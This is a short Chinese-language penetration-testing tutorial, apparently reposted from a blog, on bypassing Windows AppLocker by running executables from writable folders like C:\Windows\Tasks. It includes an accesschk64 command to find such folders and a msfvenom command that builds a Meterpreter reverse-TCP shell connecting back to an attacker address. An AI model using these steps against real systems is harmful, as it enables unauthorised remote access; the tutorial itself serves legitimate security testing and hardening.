使用弱路径规则绕过应用程序白名单

当您是渗透测试团队的一员时,发现漏洞非常重要。由于此类漏洞是黑客入侵的根源,因此攻击者会积极寻找它们。因此,为了修补此类漏洞,您必须知道如何以及在何处找到它们。此类漏洞之一就是Windows中的弱文件夹。

为了保护窗户,Microsoft提供了多种安全策略。其中一种策略不允许执行exe文件,这意味着可以由攻击者发送的恶意exe文件将无法在目标PC上运行。要应用此类策略,您需要进入Windows> Applocker>可执行规则>的本地安全策略,然后应用该策略。您可以在下面的图像中看到,已设置了默认规则。

现在,如果您尝试运行任何给定的.exe文件,它将不会运行。在这里,我尝试执行putty.exe文件,但是如您在下图中所看到的,它没有运行。

此策略的漏洞在于,尽管有这样的安全策略,但仍然只有很少的文件夹具有写和读权限,并且此类文件将从这些文件夹中执行。如果我在C驱动器> Windows>任务文件夹中运行相同的exe,即putty.exe,则它将如下图所示执行。

要检查哪些文件夹具有读写权限,可以使用以下命令:

1

accesschk64.exe "Users" c:/Windows -w

使用此命令,您可以在下图中看到,除了临时文件夹,任务文件夹和跟踪文件夹之外,其他所有访问都被拒绝。

现在让我们尝试使用msfvenom通过以下命令针对目标PC创建的恶意软件:

1

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 -f exe > shell.exe

当您在受害者的PC中执行上述恶意软件时,由于适用的安全策略,该恶意软件将无法运行。

但是,如果使用漏洞,则可以从task文件夹执行文件,如下图所示:

然后,您将根据需要进行会话。

因此,在提供安全性或攻击时,您必须了解目标计算机的所有知识,以便您可以针对它们使用它们的安全性,或者通过修补此类漏洞来提供更好的安全性。

原文地址:https://www.cnblogs.com/sup3rman/p/13745089.html